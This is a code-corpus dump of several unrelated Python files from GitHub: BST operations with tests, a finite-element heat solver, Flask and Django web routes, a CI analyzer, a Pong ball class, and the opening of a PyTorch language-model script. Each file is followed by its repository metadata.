    print(f'NO value {val} found in tree')
    return None
#-----
# BST delete
#-----
def delete_bst(root, val, parent=None):
    """Delete the first node with value *val* from the BST rooted at *root*.

    Returns the root of the updated tree; returns None when the sole root
    node itself was removed. Fixes over the original:
      * leaf deletion no longer crashes when the leaf is the tree root
        (the original dereferenced `parent.val` with parent=None);
      * the parent's child link is chosen by identity, not value comparison,
        which misbehaved with duplicate values;
      * a node with one child now adopts the whole child subtree (the
        original only copied the child's value, losing grandchildren);
      * the two-children case finds the in-order successor itself (the
        original referenced an undefined `replacement_node` -> NameError).
    """
    # Case: empty tree or val not found
    if root is None:
        print(f'DEBUG: value {val} not found in tree')
        return
    if root.val == val:
        if root.left is None and root.right is None:
            # Case: leaf
            if parent is None:
                return None  # deleting the only node in the tree
            if parent.left is root:
                parent.left = None
            else:
                parent.right = None
        elif root.left is None or root.right is None:
            # Case: 1 child -- splice the entire child subtree into this node
            child = root.left if root.left is not None else root.right
            root.val = child.val
            root.left = child.left
            root.right = child.right
        else:
            # Case: 2 children -- replace with the in-order successor
            successor = root.right
            while successor.left is not None:
                successor = successor.left
            succ_val = successor.val  # capture before the recursive delete mutates nodes
            delete_bst(root.right, succ_val, root)
            root.val = succ_val
    elif val < root.val:
        delete_bst(root.left, val, root)
    else:
        delete_bst(root.right, val, root)
    return root
#-----
# Create test tree(s)
#-----
# EXAMPLE TREE 1
#
# 10
# _/ \_
# / \
# 5 15
# / \ / \
# 3 7 13 17
#
# Build the example tree 1 shown above.
node1_1 = Node(5, Node(3), Node(7))
node1_2 = Node(15, Node(13), Node(17))
tree1 = Node(10, node1_1, node1_2)
# EXAMPLE TREE X
#
#       5
#     _/ \_
#    /     \
#   5       5
#  / \       \
# 5   5       5
#
#---
# Run & assert correctness of DFT & BFT
# TODO: Add assertions and more test cases
#---
print('Calling dft()...')
assert dft(tree1) == [10, 5, 3, 7, 15, 13, 17]
print('\n')
print('Calling dft_iter()...')
assert dft_iter(tree1) == [10, 5, 3, 7, 15, 13, 17]
print('\n')
print('Calling bft()...')
assert bft(tree1) == [10, 5, 15, 3, 7, 13, 17]
print('\n')
print('Calling insert_bst(tree1, 6)...')
result = insert_bst(tree1, 6)
assert dft(result) == [10, 5, 3, 7, 6, 15, 13, 17]
print('\n')
print('Calling insert_bst(tree1, 20)...')
result = insert_bst(tree1, 20)
assert dft(result) == [10, 5, 3, 7, 6, 15, 13, 17, 20]
print('\n')
print('Calling insert_bst(None, 100)... [case: empty tree passed]')
result = insert_bst(None, 100)
assert dft(result) == [100]
print('\n')
print('Calling lookup_bst(tree1, 13)...')
result_node = lookup_bst(tree1, 13)
assert result_node.val == 13
print('Calling lookup_bst(tree1, 1000)... [case: not found]')
result_node = lookup_bst(tree1, 1000)
assert result_node == None
print('\n')
print('Calling delete_bst(tree1, 13)... [delete leaf (parent\'s left)]')
result_root = delete_bst(tree1, 13)
assert dft(result_root) == [10, 5, 3, 7, 6, 15, 17, 20]
print('\n')
print('Calling delete_bst(tree1, 20)... [delete leaf (parent\'s right)]')
result_root = delete_bst(tree1, 20)
assert dft(result_root) == [10, 5, 3, 7, 6, 15, 17]
print('\n')
print('Calling delete_bst(tree1, 17)... [delete node w/ one child]')
result_root = delete_bst(tree1, 17)
assert dft(result_root) == [10, 5, 3, 7, 6, 15]
print('\n')
# NOTE(review): this expectation does not match in-order-successor deletion
# (successor of 5 here is 6, giving [10, 6, 3, 7, 15]); the two-children
# branch of delete_bst references an undefined `replacement_node`, so this
# assertion was never actually reached -- confirm the intended result.
print('Calling delete_bst(tree1, 5)... [delete node w/ two children]')
result_root = delete_bst(tree1, 5)
assert dft(result_root) == [10, 3, 7, 6, 15]
print('\n')
print('Calling delete_bst(Node(42), 42)... [delete only node]')
assert delete_bst(Node(42), 42) == None
print('\n')
# NOTE(review): delete_bst ends with `return root`, so a miss on a non-empty
# tree returns the unchanged root, not None -- this assertion presumably
# fails; confirm the intended return-value contract for "not found".
print('Calling delete_bst(tree1, 42)... [node not found]')
assert delete_bst(tree1, 42) == None
print('\n')
| tylerbittner/interviewkickstart | trees/basic_tree_ops.py | basic_tree_ops.py | py | 5,850 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 62,
"usage_type": "call"
}
] |
709574459 | import numpy as np
import matplotlib.pyplot as plt
import os
import pandas as pd
import csv
### NOTE: Need to make filepaths for the laptop now ###
def lagrange(X):
    """Build Lagrange basis functions on the element nodes *X*.

    Parameters
    ----------
    X : array-like
        Nodal x-locations (2 nodes -> linear, 3 nodes -> quadratic).

    Returns
    -------
    (phis, dphis, x): lists of the basis-function values and derivatives
    sampled on `x`, a default 50-point grid spanning the element.
    """
    degree = len(X) - 1
    if degree == 1:
        x0, x1 = X
        x = np.linspace(x0, x1)
        basis = [
            (x - x1) / (x0 - x1),
            (x - x0) / (x1 - x0),
        ]
        # Linear shape functions have constant slope; return it as an array.
        slopes = [
            np.full_like(x, 1 / (x0 - x1)),
            np.full_like(x, 1 / (x1 - x0)),
        ]
        return basis, slopes, x
    if degree == 2:
        x0, x1, x2 = X
        x = np.linspace(x0, x2)
        basis = [
            (x - x1) * (x - x2) / ((x0 - x1) * (x0 - x2)),
            (x - x0) * (x - x2) / ((x1 - x0) * (x1 - x2)),
            (x - x0) * (x - x1) / ((x2 - x0) * (x2 - x1)),
        ]
        slopes = [
            (2 * x - x1 - x2) / ((x0 - x1) * (x0 - x2)),
            (2 * x - x0 - x2) / ((x1 - x0) * (x1 - x2)),
            (2 * x - x0 - x1) / ((x2 - x0) * (x2 - x1)),
        ]
        return basis, slopes, x
    raise ValueError('Currently supporting only first or second order Lagrange basis functions.')
# def read_nodes(file):
# path = os.getcwd()
# if 'mattjwilliams' in path:
# path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
# node_df = pd.read_csv(os.path.join(path,file),delimiter=' ')
# return node_df
def read_file(file):
    """Load a space-delimited program file into a pandas DataFrame.

    NOTE(review): the data directory is hard-coded for two developer
    machines; the 'mattjwilliams' substring in cwd picks between them.
    """
    if 'mattjwilliams' in os.getcwd():
        base = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
    else:
        base = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
    return pd.read_csv(os.path.join(base, file), delimiter=' ')
def mesher1D(xstart, xend, n_elements, deg=1):
    """Write 'nodes.txt': per-element nodal x-locations of a uniform 1D mesh.

    deg=1 writes two nodes per element; deg=2 adds the midpoint node.
    NOTE(review): node coordinates come from np.arange on floats, which can
    drop/add an entry through rounding for some inputs -- confirm counts
    when changing the mesh.
    """
    dx = (xend - xstart) / n_elements
    arr = np.zeros((n_elements, deg + 2), dtype='object')
    arr[:, 0] = np.arange(0, n_elements, dtype='int8')
    if deg == 1:
        n_nodes = n_elements + 1  # kept for parity with the quadratic branch (unused)
        arr[:, 1] = np.arange(xstart, xend, dx)
        arr[:, 2] = np.arange(xstart + dx, xend + dx, dx)
        headers = ['element', 'node0', 'node1']
    else:
        n_nodes = 2 * n_elements + 1
        arr[:, 1] = np.arange(xstart, xend, dx)
        arr[:, 2] = np.arange(xstart + dx / 2, xend + dx / 2, dx)
        arr[:, 3] = np.arange(xstart + dx, xend + dx, dx)
        headers = ['element', 'node0', 'node1', 'node2']
    if 'mattjwilliams' in os.getcwd():
        path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
    else:
        path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
    with open(os.path.join(path, 'nodes.txt'), 'w', newline='') as f:
        writer = csv.writer(f, delimiter=' ')
        writer.writerow(headers)
        writer.writerows(arr)
    return None
def element_indexer(n_elements, deg):
    """Write 'elements.txt': element -> global node index connectivity."""
    arr = np.zeros((n_elements, deg + 2), dtype='int8')
    arr[:, 0] = np.arange(n_elements)
    if deg == 1:
        arr[:, 1] = np.arange(0, n_elements, deg)
        arr[:, 2] = np.arange(1, n_elements + 1, deg)
        headers = ['element', 'node0', 'node1']
    else:
        n_nodes = 2 * n_elements + 1
        arr[:, 1] = np.arange(0, n_nodes - 1, deg)
        arr[:, 2] = np.arange(1, n_nodes, deg)
        arr[:, 3] = np.arange(2, n_nodes + 1, deg)
        headers = ['element', 'node0', 'node1', 'node2']
    if 'mattjwilliams' in os.getcwd():
        path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
    else:
        path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
    with open(os.path.join(path, 'elements.txt'), 'w', newline='') as f:
        writer = csv.writer(f, delimiter=' ')
        writer.writerow(headers)
        writer.writerows(arr)
    return None
def global_nodes(xstart, xend, n_elements, deg=1):
    """Write 'global_nodes.txt': global node id -> x location.

    NOTE(review): np.arange(xstart, xend + dx, dx) can yield one entry too
    many/few through float rounding, which would break the column assign.
    """
    n_nodes = n_elements + 1 if deg == 1 else 2 * n_elements + 1
    arr = np.zeros((n_nodes, 2), dtype='object')
    arr[:, 0] = np.arange(n_nodes)
    dx = (xend - xstart) / (n_nodes - 1)
    arr[:, 1] = np.arange(xstart, xend + dx, dx)
    if 'mattjwilliams' in os.getcwd():
        path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
    else:
        path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
    with open(os.path.join(path, 'global_nodes.txt'), 'w', newline='') as f:
        writer = csv.writer(f, delimiter=' ')
        writer.writerow(['global node', 'x location'])
        writer.writerows(arr)
    return None
def boundary_conditions(n_elements, bcs, deg=1):
    """Write 'bcs.txt' with the end-node boundary conditions.

    *bcs* is [left type, left value, right type, right value], where
    type 1 == Dirichlet and type 2 == Neumann/flux.
    """
    left_type, left_val, right_type, right_val = bcs
    n_nodes = n_elements + 1 if deg == 1 else 2 * n_elements + 1
    arr = np.zeros((n_nodes, 3), dtype='object')
    arr[:, 0] = np.arange(n_nodes)
    arr[0, 1], arr[0, 2] = left_type, left_val
    arr[-1, 1], arr[-1, 2] = right_type, right_val
    if 'mattjwilliams' in os.getcwd():
        path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
    else:
        path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
    with open(os.path.join(path, 'bcs.txt'), 'w', newline='') as f:
        writer = csv.writer(f, delimiter=' ')
        writer.writerow(['global node', 'type', 'value'])
        writer.writerows(arr)
    return None
def properties(n_elements, k1, k2):
    """Write 'elprops.txt': per-element conductivity.

    The left half of the bar gets *k1*, the right half *k2*; for an odd
    element count the middle element belongs to the k1 half.
    """
    arr = np.zeros((n_elements, 2), dtype='object')
    split = n_elements // 2 + 1 if n_elements % 2 != 0 else n_elements // 2
    arr[:split, 1] = k1
    arr[split:, 1] = k2
    arr[:, 0] = np.arange(n_elements)
    if 'mattjwilliams' in os.getcwd():
        path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
    else:
        path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
    with open(os.path.join(path, 'elprops.txt'), 'w', newline='') as f:
        writer = csv.writer(f, delimiter=' ')
        writer.writerow(['element', 'kcond'])
        writer.writerows(arr)
    return None
if __name__ == '__main__':
    ### PREPROCESSING SECTION ###
    # rod is 100 cm long.
    xleft = 0.0
    xright = 100.0
    n_elements = 8
    # degree of basis functions
    deg = 2
    # set my local working directory for retrieving and saving program files
    path = os.getcwd()
    if 'mattjwilliams' in path:
        path = '/Users/mattjwilliams/Documents/PythonStuff/FEM/GangLi/Chapter4/HeatTransfer/ProgramFiles'
    else:
        path = '/Users/mattwilliams/Documents/PythonProjects/FEM/GangLi/IntroToFEM/Chapter4/HeatTransfer/ProgramFiles'
    fnames = ['nodes.txt','elements.txt','global_nodes.txt','bcs.txt','elprops.txt','globals.txt']
    # run functions that create the files containing the mesh information
    mesher1D(xleft,xright,n_elements,deg)
    element_indexer(n_elements,deg)
    global_nodes(xleft,xright,n_elements,deg)
    boundary_conditions(n_elements,[2,0.1,1,0.0],deg)
    properties(n_elements,0.92,0.12)
    # load information from program files into dataframes
    df_dict = {}
    df_names = ['df_nodes','df_elems','df_glob_nodes','df_bcs','df_elprops','df_globals']
    for fname, df_name in zip(fnames,df_names):
        df_dict[df_name] = read_file(fname)
    ### MAIN LOOP ###
    # Assemble the global stiffness matrix K and load vector F.
    n_nodes = n_elements*deg + 1
    K = np.zeros((n_nodes,n_nodes))
    F = np.zeros(n_nodes)
    # Global constants: ambient temperature, rod radius, convection coefficient.
    Tenv, r, kconv = df_dict['df_globals'].iloc[0]
    for e in range(n_elements):
        # Element basis functions sampled on the element's x-grid.
        node_locs = df_dict['df_nodes'].iloc[e,1:]
        N, Nx, xelem = lagrange(node_locs)
        kcond = df_dict['df_elprops'].iloc[e]['kcond']
        n = len(Nx)
        # Element stiffness matrix and load vector.
        k = np.zeros((n,n))
        f = np.zeros(n)
        for row in range(n):
            I = 2*kconv*Tenv/r*N[row]
            f[row] = np.trapz(I,x=xelem)
            for col in range(n):
                # This currently only has the first integral on the LHS
                I1 = Nx[row]*Nx[col]*kcond
                I2 = 2*kconv/r*N[row]*N[col]
                k[row,col] = np.trapz(I1,x=xelem) + np.trapz(I2,x=xelem)
        # Scatter the element matrix/vector into the global system.
        glob_nodes = df_dict['df_elems'].iloc[e,1:]
        for i,row in enumerate(glob_nodes):
            F[row] += f[i]
            for j,col in enumerate(glob_nodes):
                K[row,col] += k[i,j]
    # Apply boundary conditions: type 2 adds a flux to F, type 1 (Dirichlet)
    # is enforced with the penalty method.
    for i in range(n_nodes):
        bc_type = df_dict['df_bcs'].iloc[i]['type']
        if bc_type == 2:
            F[i] += df_dict['df_bcs'].iloc[i]['value']
        if bc_type == 1:
            penalty = abs(K[i,i]+1)*1e7
            K[i,i] = penalty
            F[i] = df_dict['df_bcs'].iloc[i]['value']*penalty
    ### END MAIN LOOP ###
    ### SOLUTION AND POST PROCESSING ###
    temps = np.linalg.solve(K,F)
    # Reconstruct the temperature field element-by-element from the nodal
    # solution and the basis functions, then plot it.
    sol = []
    xvals = []
    for e in range(n_elements):
        node_locs = df_dict['df_nodes'].iloc[e,1:]
        N, Nx, xelem = lagrange(node_locs)
        val_arr = np.zeros_like(xelem)
        xvals.append(xelem)
        for i in range(deg+1):
            val_arr += N[i]*temps[deg*e+i]
        sol.append(val_arr)
    sol_temps = np.stack(sol).flatten()
    sol_xvals = np.stack(xvals).flatten()
    plt.plot(sol_xvals,sol_temps)
    plt.grid()
    plt.xlim(sol_xvals[0],sol_xvals[-1])
    plt.ylim(0,30)
    plt.xlabel('Distance along bar (cm)')
    plt.ylabel('Temperature ($^oC$)')
    plt.title(f'FEM Solution with {n_elements} Elements and Degree {deg} Interpolants')
    plt.show()
| mattwilliams06/IntroToFEM | Chapter4/HeatTransfer/ProgramScripts/main.py | main.py | py | 10,569 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.linspace",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.ones_like",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.getcwd",
"line_n... |
29775116008 | from orders import get_model
from flask import Blueprint, redirect, render_template, request, url_for
giftcards_crud = Blueprint('giftcards_crud', __name__)

# Keep a handle on the builtin before the `list` view below shadows it.
builtin_list = list
# [START list]
@giftcards_crud.route("/")
def list():
    """Show one page of gift cards; `page_token` selects the page."""
    page_token = request.args.get('page_token', None)
    if page_token:
        page_token = page_token.encode('utf-8')
    gcs, next_page_token = get_model().gclist(cursor=page_token)
    return render_template(
        "gclist.html", gcs=gcs, next_page_token=next_page_token
    )
# [END list]
# [START view]
@giftcards_crud.route('/<id>')
def view(id):
    """Render the detail page for one gift card."""
    return render_template("gcview.html", gc=get_model().gcread(id))
# [END view]
# [START create]
@giftcards_crud.route('/add', methods=['GET', 'POST'])
def add():
    """Show the creation form; on POST create the card and redirect to it."""
    if request.method != 'POST':
        return render_template("gcform.html", action="Add", gc={})
    form_data = request.form.to_dict(flat=True)
    created = get_model().gccreate(form_data)
    return redirect(url_for('.view', id=created['id']))
# [END create]
# [START edit]
@giftcards_crud.route('/<id>/edit', methods=['GET', 'POST'])
def edit(id):
    """Show the edit form; on POST update the card and redirect to it."""
    gc = get_model().gcread(id)
    if request.method != 'POST':
        return render_template("gcform.html", action="Edit", gc=gc)
    form_data = request.form.to_dict(flat=True)
    updated = get_model().gcupdate(form_data, id)
    return redirect(url_for('.view', id=updated['id']))
# [END edit]
# [START delete]
@giftcards_crud.route('/<id>/delete')
def delete(id):
    """Delete the gift card, then return to the listing."""
    get_model().gcdelete(id)
    return redirect(url_for('.list'))
# [END delete] | rajathithan/flask | orders/giftcards_crud.py | giftcards_crud.py | py | 1,559 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "flask.r... |
40803709725 | import argparse
import datetime
from analyzer.AntiPatterns import find_anti_patterns
from analyzer.config import PROVIDERS, ANTI_PATTERNS
from analyzer.CIDetector import detect_ci_tools
from analyzer.BuildCollector import collect_builds
from analyzer.Output import create_json, create_text_files, create_images
from analyzer.utils import format_date_str
from time import time
# ARGUMENT PARSER
def repository_slug_type(arg):
    """argparse type: validate a '[provider/]username/repository' slug.

    Returns the slug unchanged, or raises ArgumentTypeError naming the
    actual problem. Bug fix: the original had the two error messages
    swapped -- an unknown provider reported "Invalid slug" and vice versa.
    """
    parsed = arg.split('/')
    # provider is included in slug
    provider_included = len(parsed) > 2
    if provider_included and parsed[0] not in PROVIDERS:
        raise argparse.ArgumentTypeError(f"Unknown provider '{parsed[0]}'")
    if len(parsed) < 2:
        raise argparse.ArgumentTypeError(f"Invalid slug '{arg}'")
    return arg
def provider_type(p):
    """argparse type: ensure *p* names a known CI provider."""
    if p not in PROVIDERS:
        raise argparse.ArgumentTypeError(
            f"Unknown provider type '{p}' allowed values are '{PROVIDERS}'"
        )
    return p
def antipattern_type(a):
    """argparse type: ensure *a* names a supported anti-pattern."""
    if a not in ANTI_PATTERNS:
        raise argparse.ArgumentTypeError(
            f"Unknown anti-pattern '{a}', allowed values are '{ANTI_PATTERNS}'"
        )
    return a
def start_date_type(d):
    """argparse type: parse a YYYY-MM-DD date; warn and return None on bad input."""
    try:
        return format_date_str(datetime.datetime.strptime(d, "%Y-%m-%d"))
    except ValueError:
        print(f"'{d}' is not in the format YYYY-MM-DD, using no date instead...")
        return None
# Command-line interface definition.
parser = argparse.ArgumentParser()
# NOTE(review): the concatenated help string below has no spaces between the
# joined literals, so the rendered help runs the pieces together -- confirm.
parser.add_argument('repository_slugs', nargs='+', type=repository_slug_type,
                    help='One or more repository slugs. A slug is constructed as follows:'
                         '[{provider}/]{username}/{repository_name}'
                         'The provider is optional. If none is given, the default provider is assumed (see -p)')
parser.add_argument('-p', '--default-provider', default='github', type=provider_type,
                    help=f'Default provider. Allowed values are {PROVIDERS}')
parser.add_argument('-do', '--detect-only', action='store_true', default=False,
                    help='Only detect CI tools in the specified repositories')
parser.add_argument('-a', '--anti-patterns', nargs='+', type=antipattern_type,
                    help=f'Select anti-patterns to detect, allowed values are {ANTI_PATTERNS}')
parser.add_argument('-nc', '--no-cache', action='store_true', default=False,
                    help='Use this flag to disable cache usage')
parser.add_argument('-ncc', '--no-create-cache', action='store_true', default=False,
                    help='Use this flag to disable cache creation')
parser.add_argument('-od', '--out-dir', type=str, help='Output path')
parser.add_argument('-v', '--verbose', action='store_true', default=False,
                    help='Provide more information in console')
parser.add_argument('-d', '--start-date', type=start_date_type,
                    help='Date to start collecting data from, if none is provided, the latest three months are '
                         'collected. Date should be formatted as YYYY-MM-DD')
# GENERAL FUNCTIONS
def analyze_repo(
        repo,
        anti_patterns=None,
        detect_only=False,
        use_cache=True,
        create_cache=True,
        verbose=False,
        out_dir=None,
        start_date=None,
        to_date=None
):
    """Run the full analysis pipeline on a single repository.

    Args:
        repo: repository object exposing .path, .branch_information() and
            .default_branch (project type -- see the Repo classes).
        anti_patterns: optional restriction of which anti-patterns to detect.
        detect_only: stop after CI-tool detection and return only the tools.
        use_cache / create_cache: toggle reading / writing the local cache.
        verbose: emit per-step progress messages with elapsed timings.
        out_dir: optional output directory for the image/JSON/text reports.
        start_date / to_date: optional build-collection window.

    Returns:
        The detected CI tools when detect_only is set, otherwise a
        (detected, anti_patterns, branch_info, default_branch) tuple.
    """
    start = time()

    def _vprint(*args, **kwargs):
        # Progress reporting is only wanted in verbose mode; replaces the
        # original `print(...) if verbose else None` expression-statements.
        if verbose:
            print(*args, **kwargs)

    print(f"===============\nStarting analysis on '{repo.path}'\n===============")

    _vprint("Detecting CI...", end='')
    detected = detect_ci_tools(repo, use_cache, create_cache)
    _vprint(f"Done ({round(time() - start, 2)}s)")

    if detect_only:
        print("Detected CI tools: ", detected)
        print(f"==== DONE, TOOK {round(time() - start, 2)}s ====\n")
        return detected

    _vprint("Collecting builds...", end='')
    builds = collect_builds(repo, use_cache, create_cache, start_date, to_date)
    _vprint(f"Done ({round(time() - start, 2)}s)")

    _vprint("Gathering branch information...", end='')
    branch_info = repo.branch_information(use_cache, create_cache)
    default_branch = repo.default_branch
    _vprint(f"Done ({round(time() - start, 2)}s)")

    _vprint("Analyzing anti-patterns...", end='')
    anti_patterns = find_anti_patterns(builds, branch_info, default_branch,
                                       restriction=anti_patterns)
    _vprint(f"Done ({round(time() - start, 2)}s)")

    _vprint("Creating output files...", end='')
    # The create_* helpers use their own default directory when out_dir is
    # not given, so only pass it through when set (same as the original
    # duplicated if/else branches).
    out_args = (anti_patterns, repo, out_dir) if out_dir else (anti_patterns, repo)
    create_images(*out_args)
    create_json(*out_args)
    create_text_files(*out_args)
    _vprint(f"Done ({round(time() - start, 2)}s)")

    print(f"==== DONE, TOOK {round(time() - start, 2)}s ====\n")
    return detected, anti_patterns, branch_info, default_branch
| FreekDS/CIAN | analyzer/__init__.py | __init__.py | py | 5,131 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "analyzer.config.PROVIDERS",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "argparse.ArgumentTypeError",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "analyzer.config.PROVIDERS",
"line_number": 34,
"usage_type": "name"
},
{
"ap... |
12538131223 | from flask import (
Flask,
render_template,
request
)
from bs4 import BeautifulSoup
import requests
from urllib.request import Request, urlopen
from flask_cors import CORS
from textblob import TextBlob
# Create the application instance
app = Flask(__name__, template_folder="templates")
CORS(app)
# Create a URL route in our application for "/"
@app.route('/')
def home():
    """Fetch the page given by ?url=... and return the concatenated text of its <p> tags."""
    url = request.args.get('url')
    # Spoof a browser User-Agent: many sites reject urllib's default agent.
    sauce = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
    soup = BeautifulSoup(urlopen(sauce).read(), 'html.parser')
    # str.join avoids the quadratic cost of repeated `result += ...`.
    result = ''.join(paragraph.text for paragraph in soup.find_all('p'))
    print("request to " + url)
    return result
# If we're running in stand alone mode, run the application
if __name__ == '__main__':
app.run(debug=True) | marynashapoval/text_analysis_bachelor_work | tryScript.py | tryScript.py | py | 831 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "flask.request.args... |
4675931038 | from django.contrib import admin
from django.urls import path
from Bank import views
# URL routes for the Bank app.
# FIX: deposit/withdraw/transfer previously all mapped to the identical
# route "LogIn-Active/actions"; Django's URL resolver stops at the first
# match, so the withdraw and transfer views were unreachable.  Each action
# now has its own path; reverse() / {% url %} lookups by name still work.
urlpatterns = [
    path("", views.homepage, name='homepage_bank'),
    path("feedback", views.feedback, name='feedback'),
    path("SignUp", views.SignUp, name='SignUp'),
    path("LogIn", views.LogIn, name='LogIn'),
    path('LogIn-Active', views.login_active, name='login-active'),
    path("LogIn-Active/deposit", views.deposit, name='deposit'),
    path("LogIn-Active/withdraw", views.withdraw, name='withdraw'),
    path("LogIn-Active/transfer", views.transfer, name='transfer'),
    path("LogIn-Active/register", views.register, name='register'),
]
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "Bank.views.homepage",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "Bank.views",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.urls.path",
... |
16618551872 | import pygame, random, sys
class Ball:
    """Pong ball: owns its position/velocity, bounces off walls and the paddle."""

    def __init__(self):
        self.x = 380.0
        self.y = 280.0
        self.radius = 20
        self.velocityX = 0.0
        self.velocityY = 0.0
        self.speed = 150.0

    def draw(self, window):
        """Render the ball as a filled white circle at its current position."""
        center = (int(self.x), int(self.y))
        pygame.draw.circle(window, (255, 255, 255), center, self.radius, 0)

    def update(self, deltaTime, player):
        """Advance the ball by deltaTime seconds; end the game on a miss."""
        if self.velocityX == 0 and self.velocityY == 0:
            self._serve()
        self._check_bounds(player)
        self.x += self.velocityX * deltaTime
        self.y += self.velocityY * deltaTime
        if (self.y + self.radius) >= 600:
            print("You lost!")
            pygame.quit()
            sys.exit()

    def _serve(self):
        # Pick a random initial direction.  A draw of 0 leaves the ball at
        # rest so a fresh direction is drawn on the next frame (this matches
        # the original behaviour exactly).
        direction = random.randint(0, 3)
        if direction == 1:
            self.velocityX = -self.speed
            self.velocityY = self.speed
        if direction == 2:
            self.velocityY = self.speed
        if direction == 3:
            self.velocityX = self.speed
            self.velocityY = self.speed

    def _check_bounds(self, player):
        """Reflect the velocity at the side/top walls and off the paddle."""
        if (self.x - self.radius) <= 0:
            self.velocityX = -self.velocityX
        if (self.x + self.radius) >= 800:
            self.velocityX = -self.velocityX
        if (self.y - self.radius) <= 0:
            self.velocityY = -self.velocityY
        if (self.y + self.radius) >= 560:
            hits_paddle = ((self.x + self.radius) >= player.x
                           and (self.x - self.radius) <= player.x + 150)
            if hits_paddle:
                self.velocityY = -self.velocityY
| mbedded-mike/Pong | ball.py | ball.py | py | 1,522 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.draw.circle",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pygame.draw",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pygame.quit",
... |
18026113140 | # coding: utf-8
## Author: Jiayi Chen
## Time-stamp: 11/26/2018
import argparse
import time
import math
import os
import torch
import torch.nn as nn
import torch.onnx
parser = argparse.ArgumentParser(description='PyTorch Wikitext-2 RNN/LSTM Language Model')
parser.add_argument('--data', type=str, default='trn-wiki.txt',
help='location of the data corpus')
parser.add_argument('--model', type=str, default='LSTM',
help='type of recurrent net (RNN_TANH, RNN_RELU, LSTM, GRU)')
parser.add_argument('--emsize', type=int, default=32,
help='size of word embeddings')
parser.add_argument('--nhid', type=int, default=32,
help='number of hidden units per layer')
parser.add_argument('--nlayers', type=int, default=1,
help='number of layers')
parser.add_argument('--lr', type=float, default=0.7,
help='initial learning rate')
parser.add_argument('--clip', type=float, default=3,
help='gradient clipping')
parser.add_argument('--epochs', type=int, default=50,
help='upper epoch limit')
parser.add_argument('--batch_size', type=int, default=16, metavar='N',
help='batch size')
parser.add_argument('--bptt', type=int, default=35,
help='sequence length')
parser.add_argument('--dropout', type=float, default=0.0,
help='dropout applied to layers (0 = no dropout)')
parser.add_argument('--tied', action='store_true',
help='tie the word embedding and softmax weights')
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--cuda', action='store_true',
help='use CUDA')
parser.add_argument('--log-interval', type=int, default=200, metavar='N',
help='report interval')
parser.add_argument('--save', type=str, default='model.pt',
help='path to save the final model')
parser.add_argument('--onnx-export', type=str, default='',
help='path to export the final model in onnx format')
args = parser.parse_args()
class Dictionary(object):
    """Bidirectional word <-> integer-id mapping used to build a vocabulary."""

    def __init__(self):
        self.word2idx = {}   # word -> integer id
        self.idx2word = []   # integer id -> word

    def add_word(self, word):
        """Register *word* if unseen and return its integer id."""
        if word not in self.word2idx:
            # The new id is the current vocabulary size.
            self.word2idx[word] = len(self.idx2word)
            self.idx2word.append(word)
        return self.word2idx[word]

    def __len__(self):
        """Vocabulary size."""
        return len(self.idx2word)
class Corpus(object):
    """Loads the train/dev/test splits and tokenizes them with a shared Dictionary."""
    def __init__(self, path):
        # NOTE(review): the *path* argument is ignored -- the split filenames
        # below are hard-coded (they match the argparse --data default).
        self.dictionary = Dictionary()
        # self.train = self.tokenize(os.path.join(path, 'train.txt'))
        # self.valid = self.tokenize(os.path.join(path, 'valid.txt'))
        # self.test = self.tokenize(os.path.join(path, 'test.txt'))
        self.train = self.tokenize('trn-wiki.txt')
        self.dev = self.tokenize('dev-wiki.txt')
        self.test = self.tokenize('tst-wiki.txt')
    def tokenize(self, path):
        """Tokenizes a text file.

